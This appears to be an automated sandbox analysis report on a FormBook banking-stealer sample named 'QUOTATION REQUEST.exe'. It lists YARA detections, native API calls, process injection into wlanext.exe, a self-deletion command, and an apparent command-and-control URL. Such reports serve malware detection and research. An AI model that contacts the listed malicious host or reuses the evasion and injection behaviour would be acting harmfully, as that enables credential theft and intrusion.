Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: wlanext.exe, 00000009.00000002.485777582.0000000003D12000.00000004.00000001.sdmp | String found in binary or memory: https://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDW

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: QUOTATION REQUEST.exe
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_004181C0 NtCreateFile | 3_2_004181C0
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_00418270 NtReadFile | 3_2_00418270
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_004182F0 NtClose | 3_2_004182F0
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_004183A0 NtAllocateVirtualMemory | 3_2_004183A0
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_004182EF NtClose | 3_2_004182EF
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_004182BA NtReadFile | 3_2_004182BA
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_0041839F NtAllocateVirtualMemory | 3_2_0041839F
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639A50 NtCreateFile,LdrInitializeThunk | 9_2_03639A50
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639910 NtAdjustPrivilegesToken,LdrInitializeThunk | 9_2_03639910
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036399A0 NtCreateSection,LdrInitializeThunk | 9_2_036399A0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639860 NtQuerySystemInformation,LdrInitializeThunk | 9_2_03639860
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639840 NtDelayExecution,LdrInitializeThunk | 9_2_03639840
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639710 NtQueryInformationToken,LdrInitializeThunk | 9_2_03639710
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639FE0 NtCreateMutant,LdrInitializeThunk | 9_2_03639FE0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639780 NtMapViewOfSection,LdrInitializeThunk | 9_2_03639780
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639660 NtAllocateVirtualMemory,LdrInitializeThunk | 9_2_03639660
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639650 NtQueryValueKey,LdrInitializeThunk | 9_2_03639650
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036396E0 NtFreeVirtualMemory,LdrInitializeThunk | 9_2_036396E0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036396D0 NtCreateKey,LdrInitializeThunk | 9_2_036396D0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639540 NtReadFile,LdrInitializeThunk | 9_2_03639540
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036395D0 NtClose,LdrInitializeThunk | 9_2_036395D0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639B00 NtSetValueKey | 9_2_03639B00
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0363A3B0 NtGetContextThread | 9_2_0363A3B0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639A20 NtResumeThread | 9_2_03639A20
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639A00 NtProtectVirtualMemory | 9_2_03639A00
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639A10 NtQuerySection | 9_2_03639A10
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639A80 NtOpenDirectoryObject | 9_2_03639A80
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639950 NtQueueApcThread | 9_2_03639950
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036399D0 NtCreateProcessEx | 9_2_036399D0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0363B040 NtSuspendThread | 9_2_0363B040
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639820 NtEnumerateKey | 9_2_03639820
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036398F0 NtReadVirtualMemory | 9_2_036398F0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036398A0 NtWriteVirtualMemory | 9_2_036398A0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639760 NtOpenProcess | 9_2_03639760
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0363A770 NtOpenThread | 9_2_0363A770
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639770 NtSetInformationFile | 9_2_03639770
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639730 NtQueryVirtualMemory | 9_2_03639730
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0363A710 NtOpenProcessToken | 9_2_0363A710
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036397A0 NtUnmapViewOfSection | 9_2_036397A0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639670 NtQueryInformationProcess | 9_2_03639670
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639610 NtEnumerateValueKey | 9_2_03639610
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639560 NtWriteFile | 9_2_03639560
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03639520 NtWaitForSingleObject | 9_2_03639520
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0363AD30 NtSetContextThread | 9_2_0363AD30
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036395F0 NtQueryInformationFile | 9_2_036395F0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EE81C0 NtCreateFile | 9_2_00EE81C0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EE82F0 NtClose | 9_2_00EE82F0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EE8270 NtReadFile | 9_2_00EE8270
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EE83A0 NtAllocateVirtualMemory | 9_2_00EE83A0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EE82EF NtClose | 9_2_00EE82EF
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EE82BA NtReadFile | 9_2_00EE82BA
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EE839F NtAllocateVirtualMemory | 9_2_00EE839F
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 0_2_00C194A8 | 0_2_00C194A8
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 0_2_00C1C3A0 | 0_2_00C1C3A0
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 0_2_00C1A758 | 0_2_00C1A758
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 0_2_04C1C900 | 0_2_04C1C900
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_0040102F | 3_2_0040102F
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_00401030 | 3_2_00401030
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_00401209 | 3_2_00401209
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_0041CB85 | 3_2_0041CB85
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_00408C5D | 3_2_00408C5D
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_00408C60 | 3_2_00408C60
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_0041B4A3 | 3_2_0041B4A3
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_0041B4A6 | 3_2_0041B4A6
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_0041BD74 | 3_2_0041BD74
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_0041C58C | 3_2_0041C58C
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_00402D90 | 3_2_00402D90
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_0041CF94 | 3_2_0041CF94
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_00402FB0 | 3_2_00402FB0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036C2B28 | 9_2_036C2B28
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036B03DA | 9_2_036B03DA
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036BDBD2 | 9_2_036BDBD2
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0362EBB0 | 9_2_0362EBB0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036AFA2B | 9_2_036AFA2B
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036C22AE | 9_2_036C22AE
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03614120 | 9_2_03614120
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_035FF900 | 9_2_035FF900
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036CE824 | 9_2_036CE824
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036B1002 | 9_2_036B1002
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036C28EC | 9_2_036C28EC
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036220A0 | 9_2_036220A0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036C20A8 | 9_2_036C20A8
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0360B090 | 9_2_0360B090
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036C1FF1 | 9_2_036C1FF1
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036CDFCE | 9_2_036CDFCE
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03616E30 | 9_2_03616E30
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036BD616 | 9_2_036BD616
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036C2EF7 | 9_2_036C2EF7
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036C1D55 | 9_2_036C1D55
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036C2D07 | 9_2_036C2D07
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_035F0D20 | 9_2_035F0D20
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0360D5E0 | 9_2_0360D5E0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036C25DD | 9_2_036C25DD
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03622581 | 9_2_03622581
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_036BD466 | 9_2_036BD466
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0360841F | 9_2_0360841F
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EECB85 | 9_2_00EECB85
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EEB4A6 | 9_2_00EEB4A6
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EEB4A3 | 9_2_00EEB4A3
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00ED8C60 | 9_2_00ED8C60
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00ED8C5D | 9_2_00ED8C5D
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EEC58C | 9_2_00EEC58C
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00ED2D90 | 9_2_00ED2D90
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EEBD74 | 9_2_00EEBD74
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00ED2FB0 | 9_2_00ED2FB0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EECF94 | 9_2_00EECF94
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 035FB150 appears 45 times
          Source: QUOTATION REQUEST.exe, 00000000.00000002.233827964.00000000059E0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDSASignature.dll@ vs QUOTATION REQUEST.exe
          Source: QUOTATION REQUEST.exe, 00000000.00000002.227364139.00000000002E8000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228172147.0000000002631000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSimpleUI.dll( vs QUOTATION REQUEST.exe
          Source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION REQUEST.exe
          Source: QUOTATION REQUEST.exe, 00000003.00000000.224914371.0000000000CF8000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe
          Source: QUOTATION REQUEST.exe, 00000003.00000002.269766089.0000000001A52000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamewlanext.exej% vs QUOTATION REQUEST.exe
          Source: QUOTATION REQUEST.exe | Binary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe
          Source: QUOTATION REQUEST.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: QUOTATION REQUEST.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@15/6
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION REQUEST.exe.log
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_01
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: QUOTATION REQUEST.exe | Virustotal: Detection: 18%
          Source: QUOTATION REQUEST.exe | ReversingLabs: Detection: 34%
          Source: unknown | Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe C:\Users\user\Desktop\QUOTATION REQUEST.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe C:\Users\user\Desktop\QUOTATION REQUEST.exe
